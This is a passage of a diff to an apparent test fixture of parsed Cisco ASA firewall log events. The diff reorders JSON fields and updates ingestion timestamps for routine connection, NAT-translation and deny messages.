"CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995182500Z", + "ingested": "2021-12-14T14:38:25.938814067Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995187600Z", + "ingested": "2021-12-14T14:38:25.938814830Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", @@ -6251,25 +6248,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995193Z", + "ingested": "2021-12-14T14:38:25.938815884Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995197700Z", + "ingested": "2021-12-14T14:38:25.938838301Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.995203100Z", + "ingested": "2021-12-14T14:38:25.938841062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", @@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995209500Z", + "ingested": "2021-12-14T14:38:25.938841594Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995215800Z", + "ingested": "2021-12-14T14:38:25.938842082Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995222500Z", + "ingested": "2021-12-14T14:38:25.938842533Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995229300Z", + "ingested": "2021-12-14T14:38:25.938843089Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995235600Z", + "ingested": "2021-12-14T14:38:25.938843759Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995241900Z", + "ingested": "2021-12-14T14:38:25.938844226Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995248200Z", + "ingested": "2021-12-14T14:38:25.938844781Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995254300Z", + "ingested": "2021-12-14T14:38:25.938845243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995260900Z", + "ingested": "2021-12-14T14:38:25.938845717Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995267200Z", + "ingested": "2021-12-14T14:38:25.938846258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995273600Z", + "ingested": "2021-12-14T14:38:25.938847270Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995280Z", + "ingested": "2021-12-14T14:38:25.938847845Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995287300Z", + "ingested": "2021-12-14T14:38:25.938848310Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995291600Z", + "ingested": "2021-12-14T14:38:25.938848827Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995296600Z", + "ingested": "2021-12-14T14:38:25.938849293Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995303600Z", + "ingested": "2021-12-14T14:38:25.938849857Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995310200Z", + "ingested": "2021-12-14T14:38:25.938850481Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995314700Z", + "ingested": "2021-12-14T14:38:25.938850946Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995319900Z", + "ingested": "2021-12-14T14:38:25.938851412Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995326200Z", + "ingested": "2021-12-14T14:38:25.938851883Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", @@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995331100Z", + "ingested": "2021-12-14T14:38:25.938852532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995372700Z", + "ingested": "2021-12-14T14:38:25.938853199Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995380500Z", + "ingested": "2021-12-14T14:38:25.938853672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995385500Z", + "ingested": "2021-12-14T14:38:25.938854224Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995390700Z", + "ingested": "2021-12-14T14:38:25.938854692Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", @@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995397100Z", + "ingested": "2021-12-14T14:38:25.938855253Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995403400Z", + "ingested": "2021-12-14T14:38:25.938855796Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995409700Z", + "ingested": "2021-12-14T14:38:25.938856945Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995416Z", + "ingested": "2021-12-14T14:38:25.938857471Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995422500Z", + "ingested": "2021-12-14T14:38:25.938858487Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", @@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995428900Z", + "ingested": "2021-12-14T14:38:25.938858969Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995435100Z", + "ingested": "2021-12-14T14:38:25.938859496Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995441300Z", + "ingested": "2021-12-14T14:38:25.938860134Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995447700Z", + "ingested": "2021-12-14T14:38:25.938860596Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995454100Z", + "ingested": "2021-12-14T14:38:25.938861065Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", @@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995460400Z", + "ingested": "2021-12-14T14:38:25.938861528Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995465Z", + "ingested": "2021-12-14T14:38:25.938861997Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995470400Z", + "ingested": "2021-12-14T14:38:25.938906543Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995475600Z", + "ingested": "2021-12-14T14:38:25.938937071Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995482100Z", + "ingested": "2021-12-14T14:38:25.938941025Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", @@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995486500Z", + "ingested": "2021-12-14T14:38:25.938941913Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995491300Z", + "ingested": "2021-12-14T14:38:25.938942667Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995495800Z", + "ingested": "2021-12-14T14:38:25.938943369Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995500500Z", + "ingested": "2021-12-14T14:38:25.938944285Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995505500Z", + "ingested": "2021-12-14T14:38:25.938945136Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", @@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995509700Z", + "ingested": "2021-12-14T14:38:25.938945955Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995515200Z", + "ingested": "2021-12-14T14:38:25.938946655Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995521400Z", + "ingested": "2021-12-14T14:38:25.938947347Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995526700Z", + "ingested": "2021-12-14T14:38:25.938948191Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995532Z", + "ingested": "2021-12-14T14:38:25.938949200Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", @@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995537700Z", + "ingested": "2021-12-14T14:38:25.938949871Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995542900Z", + "ingested": "2021-12-14T14:38:25.938950593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995548300Z", + "ingested": "2021-12-14T14:38:25.938951339Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995554700Z", + "ingested": "2021-12-14T14:38:25.938952040Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995561100Z", + "ingested": "2021-12-14T14:38:25.938952918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", @@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995567600Z", + "ingested": "2021-12-14T14:38:25.938953467Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995573800Z", + "ingested": "2021-12-14T14:38:25.938953954Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995580400Z", + "ingested": "2021-12-14T14:38:25.938954418Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995586500Z", + "ingested": "2021-12-14T14:38:25.938955003Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995592800Z", + "ingested": "2021-12-14T14:38:25.938955469Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", @@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995599Z", + "ingested": "2021-12-14T14:38:25.938956088Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995605200Z", + "ingested": "2021-12-14T14:38:25.938956589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995610700Z", + "ingested": "2021-12-14T14:38:25.938957069Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995614500Z", + "ingested": "2021-12-14T14:38:25.938957536Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995619400Z", + "ingested": "2021-12-14T14:38:25.938958002Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", @@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995625200Z", + "ingested": "2021-12-14T14:38:25.938958471Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": 